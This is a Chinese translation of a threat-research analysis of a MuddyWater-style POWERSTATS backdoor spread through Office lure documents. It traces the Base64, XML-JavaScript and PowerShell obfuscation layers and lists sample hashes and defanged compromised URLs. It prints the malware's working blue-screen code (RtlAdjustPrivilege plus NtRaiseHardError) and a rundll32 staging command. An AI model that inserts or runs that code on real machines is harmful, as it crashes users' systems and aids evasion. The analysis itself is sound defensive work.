-
-
[翻译]新“水坑”攻击样本分析
-
2018-5-18 15:53
-
新“水坑”攻击样本分析
简介
自从上次写文章分析“水坑”攻击已经有2个月了,我当时还天真地认为他们将沉寂一段时间,现在看来的确是过于乐观了。自这周起,我就不断捕获到新的样本。尽管与早前的样本存在许多共同点,但正如此前预期,新的样本在混淆方面进行了改进。我们关注的重点依然是其分层混淆和 PowerShell 代码,不过,我会对比此前的旧样本,标记出新样本的改进之处。
下面的是该攻击的"诱饵"文档截图,文件的哈希将在文末给出:
图 1:巴基斯坦选举委员会
图 2:Invest in Turkey网
图 3:IQMOFA
图 4:巴基斯坦国民议会
图 5:土耳其安全指南
从上面的图片可以看到,此次攻击的目标依然是中东地区(土耳其和伊拉克) 和巴基斯坦。一如我之前的博客中提到的,这些“引诱”文档将在一定程度上告诉我们攻击的目标是哪些组织机构和企业。从 VT 提交时间上来看,此次攻击持续时间为2月中旬到最近的捕获样本时间--2018年5月6日。这些样本大多以"mofa.gov.iq.doc" - 94625dd8151814dd6186735a6a6a87b2a4c71c04b8402caf314fb6f98434eaad命名,MOFA,即是外交部(Ministry of Foreign Affairs)的缩写。
逐步分析
下面,将进入对样本的详细分析阶段。POWERSTATS 后门中新的、更改过的混淆代码段,或是额外添加的功能,我都会高亮地标记出来。该样本文档中的宏代码经过 Base64 的多重编码,具体如下图所示:
图 6:宏代码
图 7 :第一段 Base64 编码
图 8:第二段 Base64 编码
图 9:第三段 Base64 编码
- 第一段的文本经Base64解码后为下图所示的一段编码数据:
图 10:编码的数据 - 第二段文本Base64解码为 "c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,"
- 第三段文本解码后是包含 JavaScript 混淆代码的XML编码,如下图:
图 11:编码在 XML 中的 JavaScript
将 XML 中的 JavaScript 提取出来,
图 12:解码 JavaScript
解码出来的脚本实际上是 Power Shell 脚本——为了实现进一步解码的路径:"C:\\ProgramData\\WindowsDefenderService.ini"。这个路径下的文件实际上就是第一段 Base64 编码块的内容。
解码出来的内容其实就是 POWERSTATS 后门的变种。让我们来详细研究研究变种中的混淆层。
- 首先,Base64 解码得到的是编码的 PowerShell。
图 13:第一段编码的 PowerShell
值得注意的是,代码中的 iex 其实是 Invoke-expression (的变体。为了看到输出内容,我么将 iex 替换为 Write-Output ,将看到下面的输出:
图 14:第一层解码
尽管看起来很混乱,不过却有点眼熟。The character substitute 。更进一步,我们观察到上图中"&((vaRIABle 'MDR').NAME[3,11,2]-jOiN'')" ,这实际是经过混淆的 Invoke - Expression 。这意味着我们仍然可以用 Write-Output 替换它,得到的结果如下:
图 15:二层解码
又一次,你会注意到 "( $enV:ComSpEc[4,24,25]-jOiN'')" 用作 iex 。同样可以将之替换为 Write-Output。这样的循环混淆直到解码后的脚本类似于下图所示的 --包含代理 URL 和 IP 的脚本:
图 16:最终解码后的 PowerShell
这只是众多多层编码的 PowerShell 脚本的一小块。剩余的第二、第三部分是后门的实际功能部分。
新旧比对
我在先前的博客中分析的函数,大多数依然以变种的形式存在。当然,还有一些新添加的和改进过的代码:
- 截图部分已经重写,只是功能未变。该部分负责截取受害主机的屏幕,保存为PNG格式,并以 Base64 编码图片字节,最后上传到 C&C 服务器。
图 17:Screenshot function and encode - 导致进程死机蓝屏的 BSOD 代码。这部分主要包括反调试和反分析技术:
图 18:搜寻 VM 进程
图片底部高亮标记的函数 "GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG" 是下面代码块的开头:
function GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG(){
$s = @"
using System;
using System.Runtime.InteropServices;
public static class C{
[DllImport("ntdll.dll")]
public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
[DllImport("ntdll.dll")]
public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
public static unsafe void Kill(){
Boolean tmp1;
uint tmp2;
RtlAdjustPrivilege(19, true, false, out tmp1);
NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);
}
}
"@
$c = new-object -typename system.CodeDom.Compiler.CompilerParameters
$c.CompilerOptions = '/unsafe'
$a = Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c
[C]::Kill()
}
这段代码实际上是 Barrett Adams(@peewpw)上个月创建的 Invoke - BSOD 项目,可以在他的 GitHub 主页上查看。特别注意的是,作者申明,该段代码无需管理员权限即可 BSOD 机器。
- 此外,该后门还在 ProgramData 文件夹搜索 “Kasper,Panda ,ESET”字符串的函数。一旦存在此类字符串,立即终止截图和上传部分。
总结
结合此前的分析文章,该攻击组织依然在活动中,并将目标对准更多其他国家。总的来说,“水坑”攻击特点为:
- 后门部分包含数层的混淆代码,使用 Base64 -> 混淆在XML中的 JavaScript -> PowerShell 混淆;
- 在 POWERSTATS 引入 BSOD 代码,阻碍调试分析;
- 仅依靠 DDEIinitiate 进行横向移动,似乎已经抛弃先前的方法。
[原文]:(https://sec0wn.blogspot.ae/2018/05/clearing-muddywater-analysis-of-new.html?m=1)
编译:看雪翻译小组 StrokMitream
校对:看雪翻译小组
附录
哈希值
94625dd8151814dd6186735a6a6a87b2a4c71c04b8402caf314fb6f98434eaad 5c7d16bd89ef37fe02cac1851e7214a01636ee4061a80bfdbde3a2d199721a79 76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338 707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024 b7b8faac19a58548b28506415f9ece479055e9af0557911ca8bbaa82b483ffb8 18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd
感染网址列表
hxxp://alessandrofoglino[.]com//wp-config-ini.php hxxps://www.theharith[.]com/wp-includes/wp-config-ini.php hxxp://www.easy-home-sales[.]co.za//wp-config-ini.php hxxps://amishcountryfurnishings[.]com/awstats/wp-config-ini.php hxxp://chinamall[.]co.za//wp-config-ini.php hxxp://themotoringcalendar[.]co.za//wp-config-ini.php hxxp://bluehawkbeats[.]com//wp-config-ini.php hxxp://www.gilforsenate[.]com//wp-config-ini.php hxxp://answerstoprayer[.]org//wp-config-ini.php hxxp://mgamule[.]co.za/oldweb/wp-config-ini.php hxxp://chrisdejager-attorneys[.]co.za//wp-config-ini.php hxxp://finalnewstv[.]com//wp-config-ini.php hxxps://www.brand-stories.gr//wp-config-ini.php hxxp://www.duotonedigital[.]co.za//wp-config-ini.php hxxp://www.britishasia-equip[.]co.uk//wp-config-ini.php hxxp://www.tanati[.]co.za//wp-config-ini.php hxxp://emware[.]co.za//wp-config-ini.php hxxp://breastfeedingbra[.]co.za//wp-config-ini.php hxxp://www.androidwikihow[.]com//wp-config-ini.php hxxp://cashforyousa[.]co.za//wp-config-ini.php hxxp://hesterwebber[.]co.za//wp-config-ini.php hxxp://bramloosveld.be/trainer/wp-config-ini.php hxxp://fickstarelectrical[.]co.za//wp-config-ini.php hxxp://buchnation[.]com//wp-config-ini.php hxxp://hostingvalley[.]co.uk/downloads/wp-config-ini.php hxxp://bluefor[.]com/magento/wp-config-ini.php hxxp://foryou.guru/css/wp-config-ini.php hxxp://www.daleth[.]co.za//wp-config-ini.php hxxps://www.buyandenjoy.pk//wp-config-ini.php hxxps://annodle[.]com/wp-includes/wp-config-ini.php hxxp://goldeninstitute[.]co.za/contents/wp-config-ini.php hxxp://advss[.]co.za/images/wp-config-ini.php hxxp://ednpk[.]com//wp-config-ini.php hxxp://proeventsports[.]co.za/wp-admin/wp-config-ini.php hxxp://glenbridge[.]co.za//wp-config-ini.php hxxp://berped[.]co.za//wp-config-ini.php hxxp://best-digital-slr-cameras[.]com//wp-config-ini.php hxxps://kamas.pk//wp-config-ini.php hxxps://bekkersweldingservice.nl//wp-config-ini.php hxxp://bogdanandreescu.fit//wp-config-ini.php hxxp://www.bashancorp[.]co.za//wp-config-ini.php hxxps://www.bmcars.nl/wp-admin/wp-config-ini.php hxxp://visionclinic[.]co.ls/visionclinic/wp-config-ini.php hxxps://www.antojoentucocina[.]com//wp-config-ini.php hxxp://www.ihlosiqs-pm[.]co.za//wp-config-ini.php hxxp://capitalradiopetition[.]co.za//wp-config-ini.php hxxp://www.generictoners[.]co.za//wp-config-ini.php hxxp://almaqsd[.]com/wp-includes/wp-config-ini.php hxxp://www.alessioborzuola[.]com/downloads/wp-config-ini.php hxxp://briskid[.]com//wp-config-ini.php hxxp://bios-chip[.]co.za//wp-config-ini.php hxxp://www.crissamconsulting[.]co.za//wp-config-ini.php hxxp://capriflower[.]co.za//wp-config-ini.php hxxp://www.dingaanassociates[.]co.za//wp-config-ini.php hxxp://batistadopovosjc[.]org.br//wp-config-ini.php hxxp://indiba-africa[.]co.za//wp-config-ini.php hxxp://apollonweb[.]com//wp-config-ini.php hxxps://www.amighini.it/webservice/wp-config-ini.php hxxp://blackrabbitthailand[.]com//wp-config-ini.php hxxp://batthiqbal[.]com/sagenda/webroot/wp-config-ini.php hxxp://clandecor[.]co.za/rvsUtf8Backup/wp-config-ini.php hxxp://bakron[.]co.za//wp-config-ini.php hxxp://gsnconsulting[.]co.za//wp-config-ini.php hxxp://vumavaluations[.]co.za//wp-config-ini.php hxxp://heritagetravelmw[.]com//wp-config-ini.php hxxp://www.moboradar[.]com/wp-includes/wp-config-ini.php hxxps://news9pakistan[.]com/wp-includes/wp-config-ini.php hxxp://havilahglo[.]co.za/wpscripts/wp-config-ini.php hxxp://binaries.site/wink/wp-config-ini.php hxxp://www.bestdecorativemirrors[.]com/More-Mirrors/wp-config-ini.php hxxp://clouditzone[.]com/revolution/assets/wp-config-ini.php hxxp://delectronics[.]com.pk//wp-config-ini.php hxxps://boudua[.]com//wp-config-ini.php hxxp://baynetins[.]com//wp-config-ini.php hxxp://insafradio.pk/pos/wp-config-ini.php hxxp://www.harmonyguesthouse[.]co.za//wp-config-ini.php hxxp://fsproperties[.]co.za/engine1/wp-config-ini.php hxxp://desirablehair[.]co.za//wp-config-ini.php hxxp://comsip[.]org.mw//wp-config-ini.php hxxp://www.wbdrivingschool[.]com//wp-config-ini.php hxxp://jdcorporate[.]co.za/catalog/wp-config-ini.php hxxp://bradleysherrer[.]com/wp/wp-config-ini.php hxxp://debnoch[.]com/image/wp-config-ini.php hxxp://adsbook[.]co.za//wp-config-ini.php hxxp://host4unix.net/host24new/wp-config-ini.php hxxp://jvpsfunerals[.]co.za//wp-config-ini.php hxxp://immaculatepainters[.]co.za//wp-config-ini.php hxxp://tcpbereka[.]co.za/js/wp-config-ini.php hxxp://investaholdings[.]co.za/htc/wp-config-ini.php hxxp://tuules[.]com//wp-config-ini.php hxxp://findinfo-more[.]com//wp-config-ini.php hxxp://bmorecleaning[.]com//wp-config-ini.php hxxp://www.goolineb2b[.]com//wp-config-ini.php hxxp://www.triconfabrication[.]com/wp-includes/wp-config-ini.php hxxp://irshadfoundation[.]co.za//wp-config-ini.php hxxp://www.blattoamsterdam[.]com//wp-config-ini.php hxxp://ladiescircle[.]co.za//wp-config-ini.php hxxp://domesticguardians[.]co.za/Banner/wp-config-ini.php hxxp://jhphotoedits[.]co.za//wp-config-ini.php hxxp://iqra[.]co.za/pub/wp-config-ini.php hxxps://bestbedrails.reviews//wp-config-ini.php hxxp://www.banditrockradio[.]com//wp-config-ini.php hxxp://burgercoetzeeattorneys[.]co.za//wp-config-ini.php hxxp://burgeystikihut[.]com//wp-config-ini.php hxxp://alphaobring[.]com//wp-config-ini.php hxxp://www.galwayprimary[.]co.za//wp-config-ini.php hxxps://lahorewholesalemarket[.]com//wp-config-ini.php hxxp://bitandbyte62[.]com/faibrescia/wp-config-ini.php hxxp://www.bioforgehealth[.]org//wp-config-ini.php hxxp://www.brianzashop.it//wp-config-ini.php hxxp://geetransfers[.]co.za/font-awesome/wp-config-ini.php hxxps://www.blubaytrading[.]com//wp-config-ini.php hxxp://carlagrobler[.]co.za/components/wp-config-ini.php hxxp://btfila[.]org/wp-includes/wp-config-ini.php hxxp://lensofafrica[.]co.za//wp-config-ini.php hxxp://greenacrestf[.]co.za/video/wp-config-ini.php hxxp://www.tonaro[.]co.za//wp-config-ini.php hxxp://www.amphibiblechurch[.]com/wp-admin/wp-config-ini.php hxxp://bumpapps[.]com/apps/wp-config-ini.php hxxp://ambiances-toiles.fr//wp-config-ini.php hxxp://dailyqadamat[.]com//wp-config-ini.php hxxp://tophillsports[.]com//wp-config-ini.php hxxp://chrishanicdc[.]org/wpimages/wp-config-ini.php hxxp://architectsinc.net/mail/wp-config-ini.php hxxp://www.ieced[.]com.pk//wp-config-ini.php hxxp://entracorntrading[.]co.za//wp-config-ini.php hxxps://www.besman.de//wp-config-ini.php hxxp://chickenandkitchen[.]com//wp-config-ini.php hxxps://www.hosthof[.]com//wp-config-ini.php hxxp://signsoftime[.]co.za//wp-config-ini.php hxxp://www.be-indigene.be//wp-config-ini.php hxxp://absfinancialplanning[.]co.za/images/wp-config-ini.php hxxp://charispaarl[.]co.za//wp-config-ini.php hxxp://indlovusecurity[.]co.za//wp-config-ini.php hxxp://elemech[.]com.pk//wp-config-ini.php hxxp://bafflethink[.]com/administrator/wp-config-ini.php hxxp://luxconprojects[.]co.za//wp-config-ini.php hxxp://brandr.ge//wp-config-ini.php hxxps://www.amateurastronomy[.]org//wp-config-ini.php hxxp://comfortex[.]co.za/php/wp-config-ini.php hxxp://deepgraphics[.]co.za//wp-config-ini.php hxxps://iconicciti[.]com//wp-config-ini.php hxxp://www.bazookagames.net//wp-config-ini.php hxxp://sefikengfarm[.]co.ls//wp-config-ini.php hxxp://passright[.]co.za//wp-config-ini.php hxxp://aboutduvetcovers[.]com//wp-config-ini.php hxxp://seismicfactory[.]co.za//wp-config-ini.php hxxp://abadleabantu[.]co.za//wp-config-ini.php hxxp://www.gooline.net//wp-config-ini.php hxxp://bookdoctormeeting[.]com//wp-config-ini.php hxxps://aquabsafe[.]com//wp-config-ini.php hxxp://amatikulutours[.]com/tmp/wp-config-ini.php hxxp://alemaohost[.]com/meniskoumantareas.gr/public_html/tmp/wp-config-ini.php hxxp://archersassociationofamerica[.]org//wp-config-ini.php hxxps://www.baossdigital[.]com/wp-includes/wp-config-ini.php hxxp://rightwayfoundationpk[.]org/wp-admin/wp-config-ini.php hxxp://bmasokaprojects[.]co.za//wp-config-ini.php hxxp://itengineering[.]co.za/gatewaydiamond/wp-config-ini.php hxxp://globalelectricalandconstruction[.]co.za/wpscripts/wp-config-ini.php hxxp://adriaanvorster[.]co.za//wp-config-ini.php hxxps://www.boutiquesxxx[.]com//wp-config-ini.php hxxp://buildingstandards[.]com.pk//wp-config-ini.php hxxp://jakobieducation[.]co.za//wp-config-ini.php hxxp://breakoutmonitor.info//wp-config-ini.php hxxps://besttweezers.reviews//wp-config-ini.php hxxp://ldams[.]org.ls/supplies/wp-config-ini.php hxxp://menaboracks[.]co.za/tmp/wp-config-ini.php hxxp://fourseasonscaterersdecorators[.]com//wp-config-ini.php hxxp://capetownway[.]co.za//wp-config-ini.php hxxp://hartenboswaterpark[.]co.za/templates/wp-config-ini.php hxxp://fccorp[.]co.za/php/wp-config-ini.php hxxp://angar68[.]com//wp-config-ini.php hxxp://www.bestarticlespinnerr[.]com/wp-admin/wp-config-ini.php hxxp://serversvalley[.]com//wp-config-ini.php hxxp://breakbyte[.]com//wp-config-ini.php hxxps://www.logicsfort[.]com//wp-config-ini.php hxxp://blackwolfco[.]com//wp-config-ini.php hxxp://www.exomi.es/wp-admin/wp-config-ini.php hxxp://verifiedseller[.]co.za/js/wp-config-ini.php hxxps://www.bolagsregistrering.eu//wp-config-ini.php hxxp://cdxtrading[.]co.za//wp-config-ini.php hxxp://aahung[.]org//wp-config-ini.php hxxps://rstextilesourcing[.]com//wp-config-ini.php hxxps://bravori[.]com//wp-config-ini.php hxxp://buboobioinnovations[.]co.za/wpimages/wp-config-ini.php hxxp://www.advcadsys[.]com//wp-config-ini.php hxxp://isibaniedu[.]co.za/admin/wp-config-ini.php hxxp://dianakleyn[.]co.za/layouts/wp-config-ini.php hxxp://amesoulcoaching[.]com/wp-admin/wp-config-ini.php hxxp://www.loansonhomes[.]co.za//wp-config-ini.php hxxp://empowerbridge[.]com/projects/abianasystem/wp-config-ini.php hxxp://alfredocifuentes[.]com//wp-config-ini.php hxxp://www.gooline.pk//wp-config-ini.php hxxp://highschoolsuperstar[.]co.za/files/wp-config-ini.php hxxps://bogjerlow[.]com/project/wp-config-ini.php hxxp://cafawelding[.]co.za/font-awesome/wp-config-ini.php hxxp://apalawyers.pt//wp-config-ini.php hxxp://www.edesignz[.]co.za//wp-config-ini.php hxxp://centuryacademy[.]co.za/css/wp-config-ini.php hxxp://buenasia[.]com/wp-includes/wp-config-ini.php hxxp://ceramica[.]co.za//wp-config-ini.php hxxp://banjo.la//wp-config-ini.php hxxp://www.alfredoposada[.]com//wp-config-ini.php hxxp://allisonplumbing[.]com//wp-config-ini.php hxxp://eastrandmotorlab[.]co.za/fleet/wp-config-ini.php hxxp://www.mikimaths[.]com//wp-config-ini.php hxxp://hjb-racing[.]co.za/htdocs/wp-config-ini.php hxxp://welcomecaters[.]com//wp-config-ini.php hxxp://www.andreabelfi[.]com//wp-config-ini.php hxxp://www.iancullen[.]co.za//wp-config-ini.php hxxp://jeanetteproperties[.]co.za//wp-config-ini.php hxxps://www.bridgestobodhi[.]org//wp-config-ini.php hxxp://www.rejoicetheatre[.]com//wp-config-ini.php hxxps://alterwebhost[.]com//wp-config-ini.php hxxp://dpscdgkhan.edu.pk/shopping/wp-config-ini.php hxxp://edgeforensic[.]co.za//wp-config-ini.php hxxp://willpowerpos[.]co.za//wp-config-ini.php hxxp://colenesphotography[.]co.za/modules/wp-config-ini.php hxxp://bfval[.]com/tmp/wp-config-ini.php hxxps://aliart.nl//wp-config-ini.php hxxps://bosacik.sk//wp-config-ini.php hxxp://mailingservers.net//wp-config-ini.php hxxp://fbrvolume[.]co.za//wp-config-ini.php hxxp://9newshd[.]com//wp-config-ini.php hxxp://bartabee[.]com//wp-config-ini.php hxxp://www.khotsonglodge[.]co.ls//wp-config-ini.php hxxp://erniecommunications[.]co.za/js/wp-config-ini.php hxxp://promechtransport[.]co.za/scripts/wp-config-ini.php hxxp://centuriongsd[.]co.za//wp-config-ini.php hxxp://delcom[.]co.za//wp-config-ini.php hxxp://www.andrebruton[.]com//wp-config-ini.php hxxp://h-dubepromotions[.]co.za//wp-config-ini.php hxxps://bestcoolingtowels.reviews//wp-config-ini.php hxxp://crystaltidings[.]co.za//wp-config-ini.php hxxp://diegemmerkat[.]co.za//wp-config-ini.php hxxp://funisalodge[.]co.za/data1/wp-config-ini.php hxxp://www.hfhl[.]org.ls/habitat/wp-config-ini.php hxxp://experttutors[.]co.za//wp-config-ini.php hxxps://www.cartridgecave[.]co.za//wp-config-ini.php hxxp://ecs-consult[.]com//wp-config-ini.php hxxp://oftheearthphotography[.]com/www/wp-config-ini.php hxxp://hmholdings360[.]co.za//wp-config-ini.php hxxp://joyngroup[.]com//wp-config-ini.php hxxp://www.bertflierdesign.nl//wp-config-ini.php hxxp://seoinlahorepakistan[.]com/clockwork/wp-config-ini.php hxxp://africanpixels.zar.cc//wp-config-ini.php hxxp://cazochem[.]co.za/cazochem/wp-config-ini.php hxxp://ryanchristiefurniture[.]co.za//wp-config-ini.php hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/wp-config-ini.php hxxp://arabsdeals[.]com//wp-config-ini.php hxxp://www.fun4kidz[.]co.za//wp-config-ini.php hxxp://www.infratechconsulting[.]com//wp-config-ini.php hxxp://courtesydriving[.]co.za/js/wp-config-ini.php hxxp://bluecrome[.]com//wp-config-ini.php hxxp://charliewestsecurity[.]co.za//wp-config-ini.php hxxps://buildyoursalon[.]com/wp-includes/wp-config-ini.php hxxp://beehiveholdingszar[.]co.za//wp-config-ini.php hxxp://servicebox[.]co.za//wp-config-ini.php hxxp://www.malboer[.]co.za/trendy1/wp-config-ini.php hxxp://biondi[.]co//wp-config-ini.php hxxp://funeralbusinesssolution[.]com/email_template/wp-config-ini.php hxxp://ushostinc[.]com/ioncube/wp-config-ini.php hxxps://alceharfield[.]com//wp-config-ini.php hxxp://indocraft[.]co.za/test/wp-config-ini.php hxxp://www.londonbeautyclinic.pk/wp-includes/wp-config-ini.php hxxp://sullivanprimary[.]co.za//wp-config-ini.php hxxp://btg4hope[.]org//wp-config-ini.php hxxp://bo-crm[.]com/corel[.]com.bo/wp-config-ini.php hxxp://abvsecurity[.]co.za//wp-config-ini.php hxxp://cambridgetuts[.]com//wp-config-ini.php hxxps://bestaxi.nl//wp-config-ini.php hxxp://jwseshowe[.]co.za/assets/wp-config-ini.php hxxp://winagainstebola[.]com//wp-config-ini.php hxxp://anubandh.in//wp-config-ini.php hxxps://bgadvocaten.nl/wp-admin/wp-config-ini.php hxxp://freeskl[.]com/sports/wp-config-ini.php hxxp://www.abies[.]co.za//wp-config-ini.php hxxps://www.applecartng[.]com//wp-config-ini.php hxxps://bakayokocpa[.]com/wp-includes/wp-config-ini.php hxxp://www.paktechinfo[.]com/wp-includes/wp-config-ini.php hxxp://www.ariehandomri[.]com//wp-config-ini.php hxxp://lahorecoolingtower[.]com//wp-config-ini.php hxxps://boatwif[.]co.uk//wp-config-ini.php hxxp://gideonitesprojects[.]com//wp-config-ini.php hxxp://www.koshcreative[.]co.uk/wp-includes/wp-config-ini.php hxxp://iinvest4u[.]co.za//wp-config-ini.php hxxps://blankwebagency[.]com/components/wp-config-ini.php hxxp://hybridauto[.]co.za/photography/wp-config-ini.php hxxp://h-u-i[.]co.za/heiren/wp-config-ini.php hxxp://insta-art[.]co.za//wp-config-ini.php hxxp://abanganifunerals[.]co.za//wp-config-ini.php hxxp://muallematsela[.]com//wp-config-ini.php hxxps://arhiepiscopiabucurestilor.ro/templates/wp-config-ini.php hxxp://perfectlabels.net//wp-config-ini.php hxxps://www.alvarezarquitectos[.]com//wp-config-ini.php hxxp://boardaffairs[.]com//wp-config-ini.php hxxp://www.m-3[.]co.za//wp-config-ini.php hxxp://beesrenovations[.]co.za/images/wp-config-ini.php hxxp://bumbledyne[.]com/domainmod/wp-config-ini.php hxxps://blockchainadvertisements.net//wp-config-ini.php hxxp://mokorotlocorporate[.]com//wp-config-ini.php hxxp://alchimiegrafiche.net/bbdelteatro/wp-config-ini.php hxxps://bentivegna.es//wp-config-ini.php hxxp://in2accounting[.]co.za//wp-config-ini.php hxxp://capewindstrading[.]co.za//wp-config-ini.php hxxp://bonus.rocks//wp-config-ini.php hxxp://cloudhub[.]co.ls/modules/wp-config-ini.php hxxp://bansko-furniture[.]co.uk//wp-config-ini.php hxxp://digital-cameras-south-africa[.]co.za/script/wp-config-ini.php hxxp://ahmadhasanat[.]com//wp-config-ini.php hxxp://hosthof.pk/customer/wp-config-ini.php hxxps://www.engeltjieakademie[.]co.za//wp-config-ini.php hxxp://juniorad[.]co.za/vendor/wp-config-ini.php hxxp://www.dws-gov[.]co.za//wp-config-ini.php hxxp://www.getcord[.]co.za//wp-config-ini.php hxxps://brokedudepodcast[.]com//wp-config-ini.php hxxp://balaateen[.]co.za/less/wp-config-ini.php hxxp://2strongmagazine[.]co.za//wp-config-ini.php hxxp://bntlaminates[.]com//wp-config-ini.php hxxp://embali[.]co.za//wp-config-ini.php hxxp://beadbazaar[.]com.au/assets/css/wp-config-ini.php hxxp://www.centreforgovernance.uk//wp-config-ini.php hxxp://www.icsswaziland[.]com//wp-config-ini.php hxxps://bulinvestconsult[.]com//wp-config-ini.php hxxp://www.bhsmusic.net//wp-config-ini.php hxxp://fragranceoil[.]co.za//wp-config-ini.php hxxp://gvs[.]com.pk/font-awesome/wp-config-ini.php hxxp://billielaw[.]com//wp-config-ini.php hxxp://bagadesign.pt//wp-config-ini.php hxxp://bahaykuboeliterealty[.]com.au//wp-config-ini.php hxxp://haveytv[.]com//wp-config-ini.php hxxp://www.animationinisrael[.]org/tmp_images/wp-config-ini.php hxxp://www.buhlebayoacademy[.]com//wp-config-ini.php hxxp://aexergy[.]com//wp-config-ini.php hxxps://best-dreams[.]com//wp-config-ini.php hxxp://blackthorn[.]co.za//wp-config-ini.php hxxp://getabletravel[.]co.za/wpscripts/wp-config-ini.php hxxp://www.amazingtour.pk//wp-config-ini.php hxxp://printernet[.]co.za//wp-config-ini.php hxxp://genesisbs[.]co.za//wp-config-ini.php hxxp://cybercraft.biz/dist/wp-config-ini.php hxxps://www.bcppro[.]com//wp-config-ini.php hxxp://allsporthealthandfitness[.]com//wp-config-ini.php hxxp://www[.]competitiveedoptions[.]com//wp-config-ini.php hxxp://www.humorcarbons[.]com//wp-config-ini.php hxxp://intelligentprotection[.]co.za//wp-config-ini.php hxxp://lppaportal[.]org.ls//wp-config-ini.php hxxp://incoso[.]co.za/images/wp-config-ini.php hxxp://webhostinc.net//wp-config-ini.php hxxp://bitteeth[.]com/docbank/wp-config-ini.php hxxp://mukhtarfeeds[.]com//wp-config-ini.php hxxp://isound[.]co.za//wp-config-ini.php hxxp://www.acer-parts[.]co.za//wp-config-ini.php hxxp://www.gsmmid[.]com//wp-config-ini.php hxxp://24newstube[.]com//wp-config-ini.php hxxp://goolinegaming[.]com//wp-config-ini.php hxxp://hisandherskennels[.]co.za/php/wp-config-ini.php hxxp://cmhts[.]co.za/resources/wp-config-ini.php hxxp://glgroup[.]co.za/images/wp-config-ini.php hxxp://thecompasssolutions[.]co.za//wp-config-ini.php hxxp://iggleconsulting[.]com//wp-config-ini.php hxxps://anotherdayinparadise.ca//wp-config-ini.php hxxp://cupboardcure[.]co.za/vendor/wp-config-ini.php hxxp://all2wedding[.]com/wp-includes/wp-config-ini.php hxxp://allianz[.]com.pe//wp-config-ini.php hxxps://bednbreakfasthotel[.]com//wp-config-ini.php hxxp://broken-arrow[.]co.za//wp-config-ini.php hxxp://aboutbodybuildingworkout[.]com//wp-config-ini.php hxxp://www.goolinespace[.]com//wp-config-ini.php hxxp://aqarco[.]com/wp-admin/wp-config-ini.php hxxp://www.braidhairextensions[.]com//wp-config-ini.php hxxp://www.bhakkarrishtey[.]com//wp-config-ini.php hxxp://bestencouragementwords[.]com//wp-config-ini.php hxxp://agricolavicuna.cl//wp-config-ini.php hxxp://badlaretinaclinic[.]com/tmp/wp-config-ini.php hxxp://get-paid-for-online-survey[.]com//wp-config-ini.php hxxp://firstchoiceproperties[.]co.za//wp-config-ini.php hxxp://habibtextiles.pk//wp-config-ini.php hxxp://blueberrygroup[.]com.ar//wp-config-ini.php hxxp://abrahamseed[.]co.za//wp-config-ini.php hxxp://betandbeer.tips//wp-config-ini.php hxxp://molepetravel[.]co.ls//wp-config-ini.php hxxp://iiee.edu.pk//wp-config-ini.php hxxp://bella-yfaceandbodyproduct[.]com//wp-config-ini.php hxxp://www.algom-law[.]com//wp-config-ini.php hxxp://thelawyerscanvas.pk//wp-config-ini.php hxxp://satuwrite[.]com//wp-config-ini.php hxxp://bazinga-shop.eu//wp-config-ini.php hxxps://www.biosetinlabs[.]com/wp-admin/wp-config-ini.php Comments
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2019-2-2 14:35
被kanxue编辑
,原因:
|
|
|---|---|
|
|
|
|
|
|
|
|
|
